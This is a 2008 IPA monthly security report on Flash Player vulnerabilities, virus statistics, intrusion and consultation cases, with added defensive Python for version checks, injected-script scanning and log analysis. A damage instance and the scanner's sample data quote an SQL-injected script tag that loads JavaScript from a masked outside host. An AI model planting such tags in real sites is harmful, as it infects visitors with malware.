IPA/ISEC in JAPAN: virus and UCA incident report for July 2008

August 12, 2008

IT Security Center
Information-technology Promotion Agency, Japan (IPA)

This is a summary of computer virus/unauthorized computer access incident reports for July, 2008 compiled by IPA.

I. Reminder for the Month:

- Be Sure to Conduct Anti-Vulnerability Measures (*1) Thoroughly -

Never forget to update plug-ins such as Flash Player

Among the viruses analyzed by IPA in July were some that exploit a vulnerability in Flash Player.  Flash Player is a typical "plug-in", a program that adds features to application software such as a web browser, and it is embedded in almost all web browsers (*2).

Consequently, if your Flash Player still has an unresolved vulnerability, your computer can easily be infected simply by browsing a website that carries Flash content (a virus) exploiting that vulnerability.  As the number of such websites grows, the damage caused by this virus will spread widely.

Plug-ins such as Flash Player need anti-vulnerability measures just as other programs do.  Be sure to resolve any vulnerability your computer may have by updating the plug-ins of the web browsers you use.

*1 Vulnerability: in general, a weakness in security.  Also called a security hole.

*2 Source: Statistics by Adobe Systems Inc.

http://www.adobe.com/products/player_census/flashplayer/

(1) Overview of Plug-in

Chart 1-1: Overview of Plug-in

A plug-in is a program that provides additional features to application software such as a web browser (see Chart 1-1).

For instance, with the Adobe Reader plug-in you can view PDF (Portable Document Format) files in the web browser; with the QuickTime plug-in you can play movie files, and so on.  Likewise, with the Flash Player plug-in you can play Flash content.

As mentioned above, each of these plug-ins extends the functionality of the application software.


(2) Problem in Flash Player

As the number of websites carrying Flash content (a virus) that exploits a vulnerability in Flash Player grows, the damage caused by that virus is likely to spread widely.  To prevent such damage, an up-to-date, vulnerability-free Flash Player must be used.  Unlike other plug-ins, however, Flash Player has the following problems, and outdated copies tend to remain in use.

(a) Flash Player is already embedded in most web browsers when a computer is purchased, so users use it without being aware that it is installed.
(b) The automatic update mechanism is insufficient (*), and the manual update procedure is somewhat complex.
(c) The Flash Player of each browser must be updated separately, which tends to be overlooked.

(*) The automatic update check is configured by default to run at 30-day intervals.  This setting can be changed in the "Flash Player Configuration Manager".  For further details, please refer to the following site.

Flash Player help – Configuration Manager (in Japanese)

http://www.macromedia.com/support/documentation/jp/flashplayer/help/settings_manager.html

Because the problems above have not yet been solved, users must always be aware of keeping Flash Player up to date.

(3) The Virus which Exploits Vulnerability in Flash Player

Chart 1-2: Behavior of Virus which Exploits Vulnerability in Flash Player

Here we discuss the Flash content (virus) analyzed by IPA.  The virus exploits a vulnerability in Flash Player that allows arbitrary code to be executed (*3) when malicious Flash content is opened.  With a vulnerable Flash Player for Windows, your computer is easily infected simply by browsing a website in which the Flash content is embedded (see 1) and 2) in Chart 1-2).

Once infected, Flash Player acts as a downloader, or a download-supporting tool (see 3) and 4) in Chart 1-2), fetching a different virus from specific sites (see 5) in Chart 1-2).

The downloaded virus is saved as "orz.exe" and executed immediately (see 6) in Chart 1-2).  A computer on which the virus has been downloaded may suffer damage such as theft of private information or hijacking of the PC.

Anti-virus software is not almighty: it may fail to detect a virus even when up to date.  It is therefore essential to resolve the vulnerabilities on your computer.  Be sure to check your Flash Player following the procedures in (4) and (5).

*3 JVNDB-2008-001284 (in Japanese):

http://jvndb.jvn.jp/contents/ja/2008/JVNDB-2008-001284.html

(4) Checking Procedure of Flash Player

To check whether Flash Player is installed on your computer, click "Adobe Flash Player version check test" in the Adobe Flash Player Support Center (http://www.adobe.com/jp/support/flashplayer/) (in Japanese).  Chart 1-3 shows the result in Internet Explorer (hereinafter IE).  Any web browser can be used to check whether Flash Player is installed in it; be sure to check every browser you use.

Chart 1-3: One Instance of the Version Test for Flash Player (In the case of IE)

Chart 1-4 and Chart 1-5

If Flash Player is not installed in your web browser, the part enclosed by the broken line in Chart 1-3 appears as in Chart 1-4.  In this case no update is required.  If, however, the version information enclosed by the broken line appears as in Chart 1-5, Flash Player is installed in your web browser.  To check whether it is the latest version, compare the part enclosed by the broken line in Chart 1-3 with the versions listed at the bottom of the screen (see Chart 1-6).

To view the version list, scroll down the screen shown in Chart 1-3.  If your version is the latest (i.e., it matches one of the versions listed in Chart 1-6), the procedure is complete and nothing further is needed.  If not (i.e., your version number is lower than the one in the version list in Chart 1-6), go to "(5) Updating Procedure for Flash Player" and update.

Chart 1-6: Version List for Flash Player
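The comparison in (4), whether the version shown by the test page matches one of the listed versions or is lower, can be written down as a small check.  The following Python is an added example, not IPA's or Adobe's code: it assumes the version string is copied from the test page as displayed (comma- or dot-separated, empty when Flash Player is absent) and uses a constructed stand-in for the Chart 1-6 list.

```python
import re

# Constructed stand-in for the version list at the bottom of the test page (Chart 1-6).
CURRENT_VERSIONS = ["9.0.124.0"]


def parse_version(shown):
    """Parse the version string shown by the test page ('9,0,124,0' or '9.0.124.0').

    Returns a tuple of ints, None when nothing is shown (Flash Player absent),
    or the string "unrecognized" when the text is not a version at all.
    """
    shown = (shown or "").strip()
    if not shown:
        return None
    try:
        return tuple(int(p) for p in re.split(r"[.,]", shown))
    except ValueError:
        return "unrecognized"


def check_flash_version(shown, current_versions=CURRENT_VERSIONS):
    """Classify the installed version against the list of current versions.

    "not installed": the page shows no version, nothing to update.
    "current":       the version matches a listed one (or is newer than the list).
    "outdated":      the version is lower than the listed version of the same major
                     branch (or of the newest listed version if the branch is absent).
    """
    installed = parse_version(shown)
    if installed is None:
        return "not installed"
    if installed == "unrecognized":
        return "unrecognized"
    latest = [parse_version(v) for v in current_versions]
    if installed in latest:
        return "current"
    same_major = [v for v in latest if v[0] == installed[0]]
    reference = max(same_major) if same_major else max(latest)
    return "outdated" if installed < reference else "current"


if __name__ == "__main__":
    for shown in ["", "9,0,124,0", "9,0,115,0", "n/a"]:
        print(repr(shown), "->", check_flash_version(shown))
```

Run the check once per browser, as the text asks, because each browser carries its own copy of the plug-in.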

(5) Updating Procedure for Flash Player

First, uninstall the currently installed Flash Player.  The uninstallation procedure is as follows.

<How to uninstall>

(i) Download the “Adobe Flash Player uninstaller” from the following URL.

http://support.adobe.co.jp/faq/faq/qadoc.sv?230810+002 (in Japanese)

(ii) Close all applications, then run the uninstaller.
(iii) Reboot your computer.

Next, install the latest version of Flash Player from the dedicated site below.  The procedure differs slightly depending on whether the web browser is IE or another browser (Firefox, Opera, Safari, etc.), so both procedures are described separately.

<How to install>

In the case of IE

Chart 1-7

(i) Installation is not possible if the security level of the Internet zone in IE is set to "High".  As shown in Chart 1-7, first add the websites required for installing Flash Player as "Trusted sites": 1) open Internet Options ("Start" → "Control Panel" → "Internet Option"), select the Security tab and click the "Sites" button; 2) when the "Sites" window appears, add the following URLs.
  http://*.adobe.com
  http://*.macromedia.com

(ii) Next, open the dedicated installation site in IE (http://www.adobe.com/go/JP-H-GET-FLASH) (in Japanese) and click the "immediate installation" button.

At this point, the check box for the "Free Google Toolbar" is enabled as an option to be installed together; uncheck "Google Toolbar" if you do not need it.

Other than IE

(i) Open the dedicated installation site (http://www.adobe.com/go/JP-H-GET-FLASH) (in Japanese) in the web browser you use and click the "immediate installation" button.

(ii) When the dialog "Opening install_flash_player.exe" appears, click the "Save File" button to download the file.
(iii) Close the web browser and run the downloaded "install_flash_player.exe".

In either case, after installing Flash Player, run "(4) Checking Procedure of Flash Player" again to confirm that it was updated successfully.

II. Reporting Status for Computer Virus – for further details, please refer to Attachment 1 –

The detection number of viruses (*1) in July was about 191T, a 19.1% decrease from 236T in June.  The reported number of viruses (*2) in July was 1,448, a 27.7% decrease from 2,002 in June.

*1 Detection Number: cumulative count of viruses found by the reporters (filers).

*2 Reported Number: aggregated count; viruses of the same type and variant reported by the same filer on the same day are counted as one case, regardless of how many were actually found.  In July the reported number was 1,448 and the aggregated detection number was about 191T (from the May 2008 report onward we use "T (thousand)" instead of "M (million)" for the detection number).

The virus with the highest detection number was W32/Netsky with about 180T, followed by W32/Mytob with about 3T and W32/Mydoom with about 2T.

Chart 2-1

Chart 2-2

III. Reporting Status of Unauthorized Computer Access (includes Consultations) – please refer to Attachment 2 for further details –

Report for unauthorized computer access and status of consultation

                               Feb.  Mar.  Apr.  May   Jun.  Jul.
Total for Reported (a)           4    19    14     4    13    19
  Damaged (b)                    4    13    10     4    11    18
  Not Damaged (c)                0     6     4     0     2     1
Total for Consultation (d)      29    35    56    37    36    49
  Damaged (e)                   10    15    31    18    15    26
  Not Damaged (f)               19    20    25    19    21    23
Grand Total (a + d)             33    54    70    41    49    68
  Damaged (b + e)               14    28    41    22    26    44
  Not Damaged (c + f)           19    26    29    19    23    24

(1) Reporting Status for Unauthorized Computer Access

The reported number for July was 19, of which 18 were actually damaged.

(2) Accepting Status for Consultation relevant to Unauthorized Access

The total number of consultations relevant to unauthorized computer access was 49 (6 of them were also counted as reports); of these, 26 were actually damaged.

(3) Status of Damage

The breakdown of the damage: intrusion 6, DoS attack 2, source address spoofing 2, and others (damaged) 8.

Damage caused by intrusion: web page contents altered by an SQL* injection* attack in 2 cases, the server abused as a stepping stone to attack other sites in 3 cases, and web page contents altered after intrusion via the ftp server in 1 case.  The main causes of intrusion were a vulnerability in 2 cases, an easily guessable password in 2 cases, insufficient server configuration for the network in 1 case, and abuse of ftp account information in 1 case.

As for others (damaged), someone impersonating the legitimate user logged in and used services available only to that user: net auctions in 3 cases, on-line games in 2 cases, etc.

*SQL (Structured Query Language): a query language for defining and manipulating data in a relational database management system (RDBMS).

*SQL injection: an attack method that reads or alters data in a database fraudulently by exploiting a flaw or vulnerability in the program that accesses the database.

(4) Damage Instance:

[Intrusion]

(i) Database was altered by an SQL injection attack…
<Instance>
  – A virus was detected by anti-virus software when the site manager of this business accessed data stored in a database for maintenance work.
  – On examining the database table, the following script was found embedded (<script src=http://www.(xxx).com/ngg.js></script>) and the database had been altered accordingly.  This script makes users load a JavaScript file from a suspicious site and should not have been there originally.
  – The cause was a vulnerability exploited by SQL injection.
(ii) Someone impersonating me (the legitimate user) discarded my on-line game items without asking…
<Instance>
  – Suddenly, I could not log in to the on-line game site with my ID.
  – According to the site manager, someone logged in and discarded the items and coins held by my avatar in the game.
  – Since I had saved my ID and password to log in to the game automatically, they may have been read by fraudulent means.
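Instance (i) above describes an SQL injection that left an external script tag in a database table, found only when anti-virus software reacted during maintenance.  As an added example, not code from IPA or from the affected site, the following Python scans every text column of a database for such embedded script references so that tampering is found by a routine check, and shows the parameterised query style that keeps request input from being spliced into SQL text.  The database, table names and the script host (www.xxx.invalid, standing in for the report's www.(xxx).com) are constructed for the example.

```python
import re
import sqlite3

# An external script reference embedded in stored content, e.g. <script src=http://host/ngg.js>
SCRIPT_SRC = re.compile(r"<script\b[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)


def build_sample_db():
    """Constructed sample: a content database in which one article row has been tampered with."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.execute("CREATE TABLE comments (id INTEGER PRIMARY KEY, article_id INTEGER, text TEXT)")
    rows = [
        (1, "Monthly notice", "<p>Maintenance on Sunday.</p>"),
        # Constructed tampered row, mirroring the script tag quoted in the report.
        (2, "Product news", "<p>New model released.</p>"
                            "<script src=http://www.xxx.invalid/ngg.js></script>"),
    ]
    conn.executemany("INSERT INTO articles VALUES (?, ?, ?)", rows)
    conn.execute("INSERT INTO comments VALUES (1, 1, 'Thanks for the notice')")
    conn.commit()
    return conn


def text_columns(conn, table):
    """Names of the columns declared TEXT in the given table (PRAGMA table_info row: cid, name, type, ...)."""
    return [row[1] for row in conn.execute(f'PRAGMA table_info("{table}")')
            if (row[2] or "").upper() == "TEXT"]


def find_injected_scripts(conn):
    """Scan every TEXT column of every user table; return (table, column, rowid, script_url) hits."""
    hits = []
    tables = [r[0] for r in conn.execute("SELECT name FROM sqlite_master WHERE type = 'table'")]
    for table in tables:
        for col in text_columns(conn, table):
            for rowid, value in conn.execute(f'SELECT rowid, "{col}" FROM "{table}"'):
                if value is None:
                    continue
                for m in SCRIPT_SRC.finditer(value):
                    hits.append((table, col, rowid, m.group(1)))
    return hits


def lookup_article(conn, article_id):
    """Parameterised query: the caller's value is bound by the driver, never concatenated into the SQL."""
    return conn.execute("SELECT id, title FROM articles WHERE id = ?", (article_id,)).fetchone()


if __name__ == "__main__":
    db = build_sample_db()
    for table, col, rowid, url in find_injected_scripts(db):
        print(f"tampered: {table}.{col} rowid={rowid} loads {url}")
    print(lookup_article(db, 1))
```

Running the scan from a scheduled job, and diffing its output against the previous run, turns the accidental discovery in instance (i) into a deliberate integrity check; fixing the query code that allowed the injection (the parameterised form shown) removes the cause rather than the symptom.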

IV. Accepting Status of Consultation

The total number of consultations in July was 1,387.  Consultations relevant to "One-click Billing Fraud" numbered 457 (May: 372), a drastic increase and the worst figure since IPA started aggregating the numbers.  Others included consultations relevant to "Hard selling of phony security measures software" with 14 (June: 14) and relevant to "Winny" with 4 (June: 4).

Chart 4-1: All the Consultation Number Accepted by IPA over the Past 6 Months

                             Feb.  Mar.  Apr.  May   Jun.  Jul.
Total                         350   654   938  1080  1211  1387
  Automatic Response System   192   373   514   649   693   817
  Telephone                   110   214   335   379   456   500
  e-mail                       47    66    87    48    60    70
  Fax, Others                   1     1     2     4     2     0

*IPA provides consultation and advice on computer viruses and unauthorized computer access as well as other overall security issues.

Mail: for virus issues and for crack issues (addresses not reproduced on this page; telephone +81-3-5978-7517)
Tel.: +81-3-5978-7509 (24-hour automatic response)
Fax: +81-3-5978-7518 (24-hour automatic response)

*"Automatic Response System": number of cases handled by the automatic response system
*"Telephone": number of cases handled by Security Center personnel
*The total case number includes the consultation numbers in column (d) of the table in "III. Reporting Status of Unauthorized Computer Access" and in "IV. Accepting Status of Consultation".

Chart 4-1: One-click Billing Fraud: Number of Consultations

The major consultation instances are as follows.

(i) A virus is detected when I access a site I usually visit…?

Consultation:

A virus was detected by anti-virus software when I accessed a well-known site that I visit daily.  I had visited it yesterday as well, but no virus was detected then.  What happened?

Response:

It seems the site had been altered by an adversary, who embedded traps (scripts) that download a virus when a user simply accesses the site.  Since this type of trap only attacks vulnerabilities in the OS and applications, no virus will be downloaded if the vulnerabilities on the inquirer's computer are resolved.  Be sure to update your OS and applications regularly, using Microsoft Update and by updating the applications you use.

(ii) A site run on an individually set-up server was attacked…?

Consultation:

The server suddenly became unresponsive as a burst of requests hit the web server concurrently.  The source IP addresses varied.  A few hours later, the server returned to normal operation.

Response:

On visiting the URL the inquirer believed was attacked, it turned out that an article on that site had just been featured on a well-known news site.  People who saw the news site rushed to the inquirer's site; the surge was temporary, but it looked as if the site were under a DoS attack.

(When the web server's access logs were checked, the "Referer" information, i.e. the source of the requests for the article on the inquirer's site, was the legitimate news site's URL.)
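The access-log check described in the response to (ii) can be automated.  The following Python is an added example, not IPA's or the inquirer's code: it parses constructed Apache combined-format log lines, counts distinct sources and the share of requests carrying the same Referer host, and applies a labelled heuristic: many distinct sources each making a few requests with a common referring site points to a flash crowd, while a handful of sources hammering the server with no Referer is worth investigating as a possible DoS.  The thresholds are assumptions to be tuned per site.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample 1: visitors arriving from one news article (RFC 5737 test addresses).
SAMPLE_FLASH_CROWD = [
    '203.0.113.10 - - [05/Jul/2008:10:00:01 +0900] "GET /article/42 HTTP/1.1" 200 5120 "http://news.example/topics/123" "Mozilla/5.0"',
    '203.0.113.11 - - [05/Jul/2008:10:00:02 +0900] "GET /article/42 HTTP/1.1" 200 5120 "http://news.example/topics/123" "Mozilla/5.0"',
    '198.51.100.5 - - [05/Jul/2008:10:00:02 +0900] "GET /article/42 HTTP/1.1" 200 5120 "http://news.example/topics/123" "Mozilla/5.0"',
    '198.51.100.6 - - [05/Jul/2008:10:00:03 +0900] "GET /article/42 HTTP/1.1" 200 5120 "http://news.example/topics/123" "Mozilla/5.0"',
    '203.0.113.12 - - [05/Jul/2008:10:00:03 +0900] "GET /style.css HTTP/1.1" 200 900 "http://www.example.jp/article/42" "Mozilla/5.0"',
    '203.0.113.13 - - [05/Jul/2008:10:00:04 +0900] "GET /article/42 HTTP/1.1" 200 5120 "http://news.example/topics/123" "Mozilla/5.0"',
    '203.0.113.14 - - [05/Jul/2008:10:00:04 +0900] "GET /article/42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

# Constructed sample 2: two sources repeating the same request with no Referer.
SAMPLE_SUSPECT = [
    '192.0.2.7 - - [05/Jul/2008:11:00:00 +0900] "GET / HTTP/1.1" 200 5120 "-" "-"',
    '192.0.2.7 - - [05/Jul/2008:11:00:00 +0900] "GET / HTTP/1.1" 200 5120 "-" "-"',
    '192.0.2.7 - - [05/Jul/2008:11:00:00 +0900] "GET / HTTP/1.1" 503 0 "-" "-"',
    '192.0.2.7 - - [05/Jul/2008:11:00:00 +0900] "GET / HTTP/1.1" 503 0 "-" "-"',
    '192.0.2.7 - - [05/Jul/2008:11:00:00 +0900] "GET / HTTP/1.1" 503 0 "-" "-"',
    '192.0.2.7 - - [05/Jul/2008:11:00:00 +0900] "GET / HTTP/1.1" 503 0 "-" "-"',
    '192.0.2.8 - - [05/Jul/2008:11:00:01 +0900] "GET / HTTP/1.1" 503 0 "-" "-"',
    '192.0.2.8 - - [05/Jul/2008:11:00:01 +0900] "GET / HTTP/1.1" 503 0 "-" "-"',
]


def parse(lines):
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    records = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            records.append(m.groupdict())
    return records


def summarize(records):
    """Distinct sources, busiest source, and the most common Referer host with its share of all requests."""
    total = len(records)
    if total == 0:
        return {"total": 0, "sources": 0, "max_per_source": 0, "top_referrer": "", "top_referrer_share": 0.0}
    per_ip = Counter(r["ip"] for r in records)
    ref_hosts = Counter(urlsplit(r["ref"]).netloc for r in records if r["ref"] != "-")
    top_host, top_count = ref_hosts.most_common(1)[0] if ref_hosts else ("", 0)
    return {
        "total": total,
        "sources": len(per_ip),
        "max_per_source": max(per_ip.values()),
        "top_referrer": top_host,
        "top_referrer_share": top_count / total,
    }


def classify(summary, share_threshold=0.6, max_per_source=5):
    """Assumed heuristic: a common referring site plus few requests per source reads as a flash crowd."""
    if summary["top_referrer_share"] >= share_threshold and summary["max_per_source"] <= max_per_source:
        return "flash crowd"
    return "investigate"


if __name__ == "__main__":
    for name, sample in [("flash crowd sample", SAMPLE_FLASH_CROWD), ("suspect sample", SAMPLE_SUSPECT)]:
        s = summarize(parse(sample))
        print(name, s, "->", classify(s))
```

The Referer share is only a hint, since clients may omit or forge the header; in the report's case it was enough to tie the surge to the news article, which is the question a site operator needs answered before treating the event as an attack.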

V. Accessing Status Captured by the Internet Monitoring (TALOT2) in July

According to the Internet Monitoring (TALOT2), the total number of unwanted (one-sided) accesses in July 2008 was 148,028 at the 10 monitoring points, and the gross number of sources* was 63,407.  That is, 478 accesses from 205 source addresses per monitoring point per day.

*Gross number of sources: the gross number of sources that accessed TALOT2.  Accesses from an identical source to the same point/port on the same day are counted as 1.

Since each TALOT2 monitoring environment is nearly equal to the general connection environment used on the Internet, the same amount of unwanted (one-sided) access can be assumed to reach general Internet users' connections.  In other words, your computer is being accessed by about 205 unknown source addresses per day on average, or about 2 times from each source address that is considered unauthorized.

Chart 5-1: Unwanted (One-sided) Number of Access and Source Number of Access/Monitoring Point/Day in Average

Chart 5-1 shows the average number of accesses and number of sources per monitoring point per day from February to July 2008.  According to this chart, both unwanted (one-sided) accesses and sources decreased compared with June and have been decreasing continuously over the past 6 months.

The main cause of this decrease was a fall in accesses to port 445/tcp, which appear to be fraudulent accesses targeting vulnerabilities mainly in Windows file/printer sharing, and to port 1028/udp, which is used to send pop-up messages (spam) exploiting the Windows Messenger Service.  Accesses to other ports did not change significantly.

 

Contact

IT Security Center, Information-technology Promotion Agency, Japan (IPA/ISEC)
Tel: +81-3-5978-7527
Fax: +81-3-5978-7518
E-mail: (address not reproduced on this page; telephone +81-3-5978-7517)